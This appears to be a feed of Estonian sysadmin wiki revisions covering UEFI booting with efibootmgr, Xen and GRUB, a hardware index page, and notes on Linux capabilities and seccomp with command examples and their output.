* Tundub, et mingil juhul ei õnnestus efibootmgr -c ... abil lisada jääval boot sissekannet ja peale rebooti arvuti ise kuidagi avastab mingid /boot/efi failisüsteemi sissekanded ja kasutab valikuliselt neid (nt arvutil https://www.msi.com/Motherboard/H110M-PRO-VD/Overview).

* vahel ütleb efibootmgr nii

# efibootmgr -b 0 -B
Could not delete variable: Read-only file system

Aitab öelda

# mount -o remount,rw /sys/firmware/efi/efivars

===startup.nsh===

Tavaliselt püütakse nö efi shelli boot valiku tegemisel käivitada vaikimisi efi failisüsteemi juurikas asuvat skripti startup.nsh, mille sisu võiks olla nt

fs0:
\EFI\debian\grubx64.efi

===UEFI kasutamise iseärasusest erineval riistvaral===

Kuigi ootus võiks olla, et UEFI on standard, mis realiseerib nö ühetaolise kasutuskogemuse, on erinevate põlvkondade ja erinevate tootjate arvutid selles mõttes üsna erinevad.

====HP ProBook 6450b 68CDE laptop====

TODO

===Partitsioonide ettevalmistamine===

# parted /dev/sda
(parted) unit s
(parted) mklabel gpt
(parted) mkpart esp 2048 411647
(parted) mkpart boot 411648 1435647

# fdisk /dev/sda
...

Tulemusena

% parted /dev/sda p
Model: DELL PERC H310 (scsi)
Disk /dev/sda: 299GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number Start End Size File system Name Flags
1 1049kB 211MB 210MB esp boot, esp
2 211MB 735MB 524MB boot
3 735MB 299GB 299GB lvm

===Xen käivitamine UEFI keskkonnas xen-4.8-amd64.efi rakendusega===

Tundub, et 2016 novembris on Debian v. 9 Stretch paketihalduses Xen v. 4.8.0 kohal ja ka seal sisaldub xen-4.8-amd64.efi rakendus. Üks viis seda käivitada peaks olema

UEFI -> XEN.EFI -> TUUM -> INITRAMDISK

* moodustada efi failisüsteemi kataloog xen

# mkdir /boot/efi/EFI/xen

* kopeerida sinna xen efi rakendus, tuum ja initrd

# cp xen-4.8-amd64.efi vmlinuz* initrd* /boot/efi/EFI/xen

* moodustada xen efi rakenduse seadistusfail, midagi sellist

# cat xen-4.8-amd64.cfg
[global]
default=debian9

[debian9]
options=console=vga,com1 com1=9600 loglvl=all noreboot
kernel=vmlinuz-4.8.0-1-amd64 ignore_loglevel root=/dev/mapper/system-root ro nosetmode
ramdisk=initrd.img-4.8.0-1-amd64

* lisada efibootmgr abil boot valik arvuti nvram'i (alternatiiv on arvuti käivitumisel käsitsi jõuda kõnealuse efi rakenduse käivitamiseni)

# efibootmgr -L Xen -l "\EFI\xen\xen-4.8-amd64.efi" -c

Tulemusena käivitatakse Xen ja dom0 keskkond.

Kasulikud lisamaterjalid

* http://wiki.xenproject.org/wiki/Xen_EFI

===Xen käivitamine UEFI keskkonnas grubx64.efi rakendusega===

Osutub, et Xen saab UEFI keskkonnas käivitada ka nö läbi grubx64.efi rakenduse

UEFI -> GRUB.EFI -> XEN.EFI -> TUUM -> INITRAMDISK

Selleks sobib kasutada nt sellist grub seadistust

<pre>
# cat /etc/grub.d/40_custom
#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries. Simply type the
# menu entries you want to add after this comment. Be careful not to change
# the 'exec tail' line above.

menuentry "Xen EFI" {
insmod part_gpt
insmod search_fs_uuid
insmod chain
insmod fat
set root=(hd0,gpt1)
chainloader /efi/xen/xen-4.8-amd64.efi
}
</pre>

Selleks, et 'Xen EFI' oleks vaikevalik alglaaduril sobib

* kasutada /etc/default/grub.d/xen.cfg failis rida

XEN_OVERRIDE_GRUB_DEFAULT=0

* kasutada failis /etc/default/grub rida

GRUB_DEFAULT="Xen EFI"

* öelda

# update-grub

Osutub, et Xen ei saa UEFI keskkonnas käivitada käivitada läbi grubx64.efi rakenduse hüperviisorit /boot/xen-4.8-amd64.gz.

===Multiboot===

Töötava UEFI multiboot süsteemi käivitamisel on muu hulgas kolm sellist UEFI Boot valikut, nad kõik jagavad ühte ja sama ESP failisüsteemi

* debian
* ubuntu_1404
* ubuntu_1604

Sellisse UEFI multiboot süsteemi efi kataloogis asuvad grub efi rakendused paistavad nii

# ls -ld /boot/efi/EFI/*/*
-rwx------ 1 root root 143360 Apr 2 2015 /boot/efi/EFI/debian/grubx64.efi
-rwx------ 1 root root 143360 Mar 30 2015 /boot/efi/EFI/ubuntu_1404/grubx64.efi
-rwx------ 1 root root 143360 Apr 2 2015 /boot/efi/EFI/ubuntu_1604/grubx64.efi

kusjuures Debian ja Ubuntu operatsioonisüsteemid juurfailisüsteemid asuvad LVM peal (kus asub ka nö klassikaline /boot kataloog) on

* /dev/system/debian
* /dev/system/ubuntu_1404
* /dev/system/ubuntu_1604

Järgmise multiboot keskkonna tekitamiseks tuleb nt

* moodustada /dev/system/debian_test ja kopeerida sinna töötava debiani juurfailisüsteem
* bootida käsitsi mingi olemasoleva grub abil uus keskkond (kopeerides vastavasse /boot kataloogi uue süsteemi initrd ja vmlinuz)
* ühendada külge /dev/sda -> /boot/efi
* keskkonna enda sees öelda, tulemusena genereeritakse /boot/efi/EFI/debian_test/grubx64.efi

# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=debian_test --recheck

* uuendada grub.cfg (tõenäoliselt kasutatakse siis uusi uuid väärtusi jms)

# update-grub

Tulemusena on UEFI Setup boot valikute nimekirjas järgmine sissekanne lisaks. Seda näeb ka efibootmgr väljundis.

Probleem: Ebaselge selle asja juures on, et kuidas iga /boot/efi all olev grub efi rakendus teab minna just edasi tegelema oma lvm köite pealt /boot/grub kataloogiga (lugeda sealt konfi). Tundub, et kui kõnealuse süsteemi alt öelda grub-install, siis nii juhtub.

===20220317 - efi is not a directory anomaalia===

Rutiinse kõvaketaste vahetuse tulemusena arvuti ei uefi-bootinud enam. EFI Shell peal on teade, et EFI ei ole kataloog. Abistas viidatud tekst ja eriti EFI sissekande eemaldamine, seejärel nö ilmus nähtavale õige kataloog-EFI.

[[Fail:Uefi-16.gif]]

Kasulikud lisamaterjalid

* https://bbs.archlinux.org/viewtopic.php?id=271171

===Videokaardi kasutamine===

Füüsilise arvuti puhul võib olla väljakutsuv videokaardiga töötamine, st eelduseks on piisavalt uus videokaart, praktiliselt nii aastat 2015 ja edasi toodetud kaardid võiksid sobida. Vanemate kaartide puhul saab peale arvuti BIOS/Setup keskkonnas CSM väljalülitamist teate

TODO

Videokaardi töötamise kriteeriumiks on GOP (Graphics Output Protocol) protokolli tugi. Lekt ütleb

'When you try to switch to UEFI mode, the motherboard looks for a GOP driver inside the video card’s firmware to draw the initial picture.

The Problem: The GeForce 7000 series was released about 6 years before UEFI became the industry standard. It relies on Legacy BIOS INT 10h routines to show a picture.

The Result: Because the motherboard cannot find a UEFI-compatible driver on the card, it automatically re-enables the CSM (Compatibility Support Module). It is essentially saying, "I have to stay in Legacy mode, or I won't be able to show you a screen at all."

===Kasulikud lisamaterjalid===

* https://www.happyassassin.net/2014/01/25/uefi-boot-how-does-that-actually-work-then/
* Google - EFINetworkStackGettingStarted.pdf
* http://www.zdnet.com/article/hands-on-linux-uefi-multi-boot-my-way/
* https://github.com/openSUSE/kiwi/wiki/Setup-PXE-boot-with-EFI-using-grub2

Konstruktori arvuti - ASUS TUF GAMING B550-PLUS + AMD 5500

2026-05-05T04:02:27Z

Imre: Uus lehekülg: '===Sissejuhatus=== TODO ===BIOS uuendamine=== TODO ===Kasulikud lisamaterjalid=== * TODO'

===Sissejuhatus===

TODO

===BIOS uuendamine===

TODO

===Kasulikud lisamaterjalid===

* TODO

Riistvara

2026-05-05T04:01:52Z

Imre:

* [[:SLM2008 kommutaatori kasutamine]]
* [[:Riistvaraliste RAID kontrollerite kasutamine]]
* [[:HDD ketta kasutamine]]
* [[:SSD ketta kasutamine]]
* [[:NVMe ketta kasutamine]]
* [[:Monitor]]
* [[:Kettakast]]
* [[:Arvuti RAM mälu]]
* [[:CD ja DVD]]
* [[:Katkise kõvakettaga töötamine]]
* [[:Intel Active Management Technology]]
* [[:Nvidia videokaart]]
* [[:Digitemp]]
* [[:Dell MD3400 kettakast]]
* [[:PCIe]]
* [[:USB]]
* [[:SFF-xxxx liidestega salvestusseadmete kasutamine]]
* [[:Katkise arvutiga töötamine]]
* [[:Thunderbolt]]
* [[:ACPI]]
* [[:APIC]]
* [[:Timer]]
* [[:Super I/O Chip]]
* [[:udev]]

Protsessorid

* [[Generic protsessor]]
* [[Intel protsessor]]
* [[AMD protsessor]]

Arvutid

* [[:Dell]]
* [[:Supermicro 1019S-MC0T]]
* [[:Supermicro AS-1115CS-TNR]]
* [[:HPE ProLiant DL360 Gen10]]
* [[:ECC toega arvuti komplekteerimine]]
* [[:Konstruktori arvuti - Asrock Taichi X570 + AMD 5500]]
* [[:Konstruktori arvuti - ASUS WRX90E + AMD Threadripper PRO 7965WX]]
* [[:Konstruktori arvuti - ASUS TUF GAMING B550-PLUS + AMD 5500]]

Kommutaatorid

* [[:Cisco SG300-20 kommutaator]]
* [[:Linksys SRW248G4 kommutaator]]
* [[:3Com SuperStack II Switch]]
* [[:HP 1820 - 48 G switch]]
* [[:Ruckus R500]]
* [[:Trendnet TEG-2248WS]]
* [[:HP 1620-24G]]
* [[:HP 1920G POE]]

Puhvertoiteallikate kasutamine

* [[:Puhvertoiteallikas]]
* [[:NUT tarkvara kasutamine Debian Squeeze operatsioonisüsteemiga]]
* [[:NUT tarkvara kasutamine operatsioonisüsteemiga OpenBSD]]
* [[:Apcupsd tarkvara ja MODBUS protokolli kasutamine operatsioonisüsteemiga Debian]]
* [[:NUT kasutamine erinevate UPS mudelitega]]

Võrgukaardid

* [[:Võrgukaartidest üldiselt]]
* [[:Intel E810]]
* [[:Mellanox ConnectX-6 Lx]]
* [[:Mellanox ConnectX-6 Dx]]
* [[:Tarkvaraline RDMA]]

ARM

* [[ARM - server]]
* [[ARM - raspberry pi]]

Riistvara

2026-05-05T03:59:41Z

Imre:

* [[:SLM2008 kommutaatori kasutamine]]
* [[:Riistvaraliste RAID kontrollerite kasutamine]]
* [[:HDD ketta kasutamine]]
* [[:SSD ketta kasutamine]]
* [[:NVMe ketta kasutamine]]
* [[:Monitor]]
* [[:Kettakast]]
* [[:Arvuti RAM mälu]]
* [[:CD ja DVD]]
* [[:Katkise kõvakettaga töötamine]]
* [[:Intel Active Management Technology]]
* [[:Nvidia videokaart]]
* [[:Digitemp]]
* [[:Dell MD3400 kettakast]]
* [[:PCIe]]
* [[:USB]]
* [[:SFF-xxxx liidestega salvestusseadmete kasutamine]]
* [[:Katkise arvutiga töötamine]]
* [[:Thunderbolt]]
* [[:ACPI]]
* [[:APIC]]
* [[:Timer]]
* [[:Super I/O Chip]]
* [[:udev]]

Protsessorid

* [[Generic protsessor]]
* [[Intel protsessor]]
* [[AMD protsessor]]

Arvutid

* [[:Dell]]
* [[:Supermicro 1019S-MC0T]]
* [[:Supermicro AS-1115CS-TNR]]
* [[:HPE ProLiant DL360 Gen10]]
* [[:ECC toega arvuti komplekteerimine]]
* [[:Konstruktori arvuti - Asrock Taichi X570 + AMD 5500]]
* [[:Konstruktori arvuti - ASUS WRX90E + AMD Threadripper PRO 7965WX]]
* [[:Konstruktori arvuti - ASUS TUF + AMD 5500]]

Kommutaatorid

* [[:Cisco SG300-20 kommutaator]]
* [[:Linksys SRW248G4 kommutaator]]
* [[:3Com SuperStack II Switch]]
* [[:HP 1820 - 48 G switch]]
* [[:Ruckus R500]]
* [[:Trendnet TEG-2248WS]]
* [[:HP 1620-24G]]
* [[:HP 1920G POE]]

Puhvertoiteallikate kasutamine

* [[:Puhvertoiteallikas]]
* [[:NUT tarkvara kasutamine Debian Squeeze operatsioonisüsteemiga]]
* [[:NUT tarkvara kasutamine operatsioonisüsteemiga OpenBSD]]
* [[:Apcupsd tarkvara ja MODBUS protokolli kasutamine operatsioonisüsteemiga Debian]]
* [[:NUT kasutamine erinevate UPS mudelitega]]

Võrgukaardid

* [[:Võrgukaartidest üldiselt]]
* [[:Intel E810]]
* [[:Mellanox ConnectX-6 Lx]]
* [[:Mellanox ConnectX-6 Dx]]
* [[:Tarkvaraline RDMA]]

ARM

* [[ARM - server]]
* [[ARM - raspberry pi]]

Linux kernel kontrollib tegevusi

2026-05-04T15:31:57Z

Imre: /* syscall */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* protsess on arvutis esinev kõige olulisem nähtus - kõik muu on nö teda teenindav personal (riistvara (mälu, protsessor, storage, võrk), kernel, kasutajad-grupid, namespace-capabilities-seccomp-syscalls-jms raamistik)
* arvuti (prosessi) ülesandaks on üldiselt teisendada sisend väljundiks (kasutades seejuures riistara, tarkvara st teisi abistavaid protsesse jms)
* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega
* tundub, et reaalsuses see olukord ei ole väga sirgejooneline - nt apparmor sätib samuti capabilitisid (rakendub nö kõige suurem kitsendus)

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities
* https://sites.google.com/site/fullycapable/Home
* /etc/security/capability.conf

===syscall===

Süsteemi poolt toetatud syscallide nimekirja esitamiseks sobib öelda

<pre>
root@mall-ubuntu-2604-20260426:~# apt-get install auditd
root@mall-ubuntu-2604-20260426:~# ausyscall --dump | head -n 10
Using x86_64 syscall table:
0 read
1 write
2 open
3 close
4 stat
5 fstat
6 lstat
7 poll
8 lseek
...
</pre>

alternatiiv

<pre>
root@mall-ubuntu-2604-20260426:~# perf list syscalls
root@mall-ubuntu-2604-20260426:~# perf list syscalls | head -n 10
raw_syscalls:sys_enter [Tracepoint event]
raw_syscalls:sys_exit [Tracepoint event]
syscalls:sys_enter_accept [Tracepoint event]
syscalls:sys_enter_accept4 [Tracepoint event]
syscalls:sys_enter_access [Tracepoint event]
syscalls:sys_enter_acct [Tracepoint event]
syscalls:sys_enter_add_key [Tracepoint event]
syscalls:sys_enter_adjtimex [Tracepoint event]
syscalls:sys_enter_alarm [Tracepoint event]
syscalls:sys_enter_arch_prctl [Tracepoint event]
...
</pre>

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T15:29:24Z

Imre: /* Capabilities - 2026 kevad märkmed */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* protsess on arvutis esinev kõige olulisem nähtus - kõik muu on nö teda teenindav personal (riistvara (mälu, protsessor, storage, võrk), kernel, kasutajad-grupid, namespace-capabilities-seccomp-syscalls-jms raamistik)
* arvuti (prosessi) ülesandaks on üldiselt teisendada sisend väljundiks (kasutades seejuures riistara, tarkvara st teisi abistavaid protsesse jms)
* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega
* tundub, et reaalsuses see olukord ei ole väga sirgejooneline - nt apparmor sätib samuti capabilitisid (rakendub nö kõige suurem kitsendus)

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities
* https://sites.google.com/site/fullycapable/Home
* /etc/security/capability.conf

===syscall===

Süsteemi poolt toetatud syscallide nimekirja esitamiseks sobib öelda

<pre>
root@mall-ubuntu-2604-20260426:~# apt-get install auditd
root@mall-ubuntu-2604-20260426:~# ausyscall --dump | head -n 10
Using x86_64 syscall table:
0 read
1 write
2 open
3 close
4 stat
5 fstat
6 lstat
7 poll
8 lseek
...
</pre>

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
